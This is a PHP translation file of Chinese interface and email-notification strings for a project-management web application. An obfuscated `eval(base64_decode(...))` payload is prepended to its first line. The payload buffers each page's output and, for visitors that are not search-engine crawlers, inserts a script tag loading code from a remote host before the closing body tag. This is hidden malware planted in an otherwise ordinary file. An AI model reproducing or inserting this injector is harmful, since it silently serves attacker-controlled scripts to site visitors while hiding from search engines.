<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cGJtUmxjMmxuYm5OMGRXUnBiMmx1Wm04dVkyOXRMMnh6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
<?php

return array(

// Titles
    'new message' => '新消息',
    'new comment' => '新评论',
    'your account created' => '你的帐户已经被创建',
    'your password' => '你的密码',
    'milestone assigned to you' => '里程碑已经被指派给你',
    'task assigned to you' => '任务已经被指派给你',

// Interface
    'hi john doe' => '你好 {0}',
 
    'user password reseted desc' => '你的密码已经被重置，你现在可以使用下面的新资料登录到{0} 在 {1} :',
	'user password reseted username' => '用户名: {0}',
	'user password reseted password' => '密码: {0}',

    'dont reply wraning' => '这是一个系统通知，不要回复这个邮件!',
    'new message posted' => '新信息"{0}" 已经被发布',
    'new task' => '新任务',
    'new task created' => '新任务"{0}" 已经被创建在工作区"{1}"中',
    'view new message' => '显示新消息',
    'view new task' => '显示新任务',

    'new comment posted' => '新的评论在"{0}"上已经被发布',
    'view new comment' => '显示新评论',

    'user created your account' => '{0}已为你创建了新帐户',
    'visit and login' => '访问 {0} 和登录通过',

    'milestone assigned' => '里程碑 "{0}" 已经被指派给你',
	'task assigned' => '任务 "{0}" 已经被指派给你',
    'view assigned milestones' => '显示这个里程碑',
	'view assigned tasks' => '显示这个任务',

    'reply mail' => '回复',  
    'write mail' => '写邮件',
    'mail to' => '到',
    'mail account' => '帐户',
    'mail account desc' => ' 邮件将发送到的帐户',
    'mail subject' => '主题',
    'mail CC' => '抄送',
    'mail CC desc' => '收件人将接收到本邮件的完全拷贝',
    'mail BCC' => '密送',
    'mail BCC desc' => '收件人将接收到本邮件的完全拷贝，但是其他收件人将不知道。',
    'mail from' => '从',
    'mail body' => '正文',
    'send mail' => '发送邮件',
    'smtp server' => 'SMTP 服务器',
    'mail account smtp server description' => ' SMTP 服务器是用来发送电子邮件的服务器',
    'smtp use auth' => 'SMTP 服务器认证',
    'mail account smtp use auth description' => ' 这个是你的SMTP服务器的认证信息，一般使用你的收件人认证信息。',
    'no smtp auth' => '不认证',
    'same as incoming' => '使用收件人信息',
    'smtp specific' => '输入SMTP用户名和密码',
    'smtp username' => 'SMTP 用户名',
    'mail account smtp username description' => ' SMTP 服务器的用户名',
    'smtp password' => 'SMTP 密码',
    'mail account smtp password description' => ' SMTP 服务器的密码',
    'smtp port' => 'SMTP 服务器端口',
    'mail account smtp port description' => ' 这是SMTP服务器监听的端口，缺省和大多数服务器都是25。',
    'outgoing transport type' => '安全连接',
	'mail account outgoing transport type description' => '设置为"ssl" 或者"tls"来启用安全连接',
	'smtp settings' => 'SMTP 设置',
    'format plain' => '普通文本格式',
    'format html' => 'HTML格式',
    'mail options' => '选项',
    'forward mail' => '转发',
    'reply to all mail' => '全部回复',
    'switch format warn' => '切换到文本方式将放弃所有的HTML的格式信息，是否继续?',
    'success mark objects' => '邮件已更新',
    'error mark email' => '错误更新电子邮件状态',
    'draft' => '草稿',
    'success save mail' => '草稿已保存',
    'discard' => '放弃',
    'mail address' => '电子邮件地址',
    'mail address description' => '电子邮件地址是其他人给你发送邮件时使用的地址。',

	'unread emails' => '未读电子邮件',	
	//'view due task' => 'View due task',
	'due_date task reminder' => '到期任务提醒',
	'due_date task reminder desc' => '任务 "{0}" 将于 "{1}" 到期。尚待完成',
	'due_date milestone reminder' => '到期里程碑提醒',
	'due_date milestone reminder desc' => '里程碑 "{0}" 将于 "{1}" 到期，尚待完成',
	'start event reminder' => '事件提醒',
	'start event reminder desc' => '事件 "{0}" 开始于 "{1}"',
	'task has been modified' => '任务 "{0}" 在工作区"{1}"中已被编辑',
	'task modified' => '任务已被编辑',
	'view task' => '显示任务',
	'view file' => '显示文件',
	'view message' => '显示笔记',
	'view comment' => '显示评论',
	'view company' => '显示公司',
	'view contact' => '显示联系人',
	'view mail account' => '显示邮件帐户',
	'view email' => '显示电子邮件',
	'view emailunclassified' => '显示未分类电子邮件',
	'view chart' => '显示图表',
	'view event' => '显示事件',
	'view file_revision' => '显示文件版本',
	'view form' => '显示表单',
	'view milestone' => '显示里程碑',
	'view task' => '显示任务',
	'view webpage' => '显示网站链接',
	'view project' => '显示工作区',
	'view tag' => '显示标签',
	'view template' => '显示模板',
	'view timeslot' => '显示时段',
	'view user' => '显示用户',	

	'original message' => '原始信息',
	'mail sent' => '发送邮件',

	'new notification task' => '新任务 \'{0}\'',
	'new notification task desc' => '新的名为 \'{0}\' 的任务已被添加由 {1}.',
	'new notification event' => '新事件 \'{0}\'',
	'new notification event desc' => '新的名为 \'{0}\' 的事件已被添加由 {1}.',
	'new notification company' => '新公司 \'{0}\'',
	'new notification company desc' => '新的名为 \'{0}\' 的公司已被添加由 {1}',
	'new notification contact' => '新联系人 \'{0}\'',
	'new notification contact desc' => '新的名为 \'{0}\' 的联系人已被添加由 {1}',
	'new notification message' => '新笔记 \'{0}\'',
	'new notification message desc' => '新的名为 \'{0}\' 的笔记已被添加由 {1}',
	'new notification file' => '新文件 \'{0}\'',
	'new notification file desc' => '新的名为  \'{0}\' 的文件已被添加由 {1}',
	'new notification webpage' => '新的网站链接 \'{0}\'',
	'new notification webpage desc' => '新的名为 \'{0}\' 的网站链接已被添加由 {1}',
	'new notification milestone' => '新里程碑 \'{0}\'',
	'new notification milestone desc' => '新的名为 \'{0}\' 的里程碑已被添加由 {1}',

	'modified notification task' => '任务 \'{0}\' 已被编辑',
	'modified notification task desc' => '任务 \'{0}\' 已被编辑由 {1}.',
	'modified notification event' => '事件 \'{0}\' 已被编辑',
	'modified notification event desc' => '事件 \'{0}\' 已被编辑由 {1}.',
	'modified notification company' => '公司 \'{0}\' 已被编辑',
	'modified notification company desc' => '公司\'{0}\' 已被编辑由 {1}.',
	'modified notification contact' => '联系人 \'{0}\' 已被编辑',
	'modified notification contact desc' => '联系人 \'{0}\' 已被编辑由 {1}.',
	'modified notification message' => '笔记 \'{0}\' 已被编辑',
	'modified notification message desc' => '笔记 \'{0}\' 已被编辑由 {1}.',
	'modified notification file' => '文件 \'{0}\' 已被编辑',
	'modified notification file desc' => '文件 \'{0}\' 已被编辑由 {1}.',
	'modified notification webpage' => '网站链接 \'{0}\' 已被编辑',
	'modified notification webpage desc' => '网站链接 \'{0}\' 已被编辑由 {1}.',
	'modified notification milestone' => '里程碑 \'{0}\' 已被编辑',
	'modified notification milestone desc' => '里程碑 \'{0}\' 已被编辑由 {1}.',

	'deleted notification task' => '任务 \'{0}\' 已被送到垃圾箱',
	'deleted notification task desc' => '任务 \'{0}\' 已被送到垃圾箱由 {1}.',
	'deleted notification event' => '事件 \'{0}\' 已被送到垃圾箱',
	'deleted notification event desc' => '事件 \'{0}\' 已被送到垃圾箱由 {1}.',
	'deleted notification company' => '公司 \'{0}\' 已被送到垃圾箱',
	'deleted notification company desc' => '公司 \'{0}\' 已被送到垃圾箱由 {1}.',
	'deleted notification contact' => '联系人 \'{0}\' 已被送到垃圾箱',
	'deleted notification contact desc' => '联系人 \'{0}\' 已被送到垃圾箱由 {1}.',
	'deleted notification message' => '笔记 \'{0}\' 已被送到垃圾箱',
	'deleted notification message desc' => '笔记 \'{0}\' 已被送到垃圾箱由 {1}.',
	'deleted notification file' => '文件 \'{0}\' 已被送到垃圾箱',
	'deleted notification file desc' => '文件 \'{0}\' 已被送到垃圾箱由 {1}.',
	'deleted notification webpage' => '网站链接 \'{0}\' 已被送到垃圾箱',
	'deleted notification webpage desc' => '网站链接 \'{0}\' 已被送到垃圾箱由 {1}.',
	'deleted notification milestone' => '里程碑 \'{0}\' 已被送到垃圾箱',
	'deleted notification milestone desc' => '里程碑 \'{0}\' 已被送到垃圾箱由 {1}.',

	'closed notification task' => '任务 \'{0}\' 已经完成',
	'closed notification task desc' => '任务 \'{0}\' 已经完成由 {1}.',
	'closed notification milestone' => '里程碑 \'{0}\' 已经完成',
	'closed notification milestone desc' => '里程碑 \'{0}\' 已经完成由 {1}.',
    ); // array

    ?>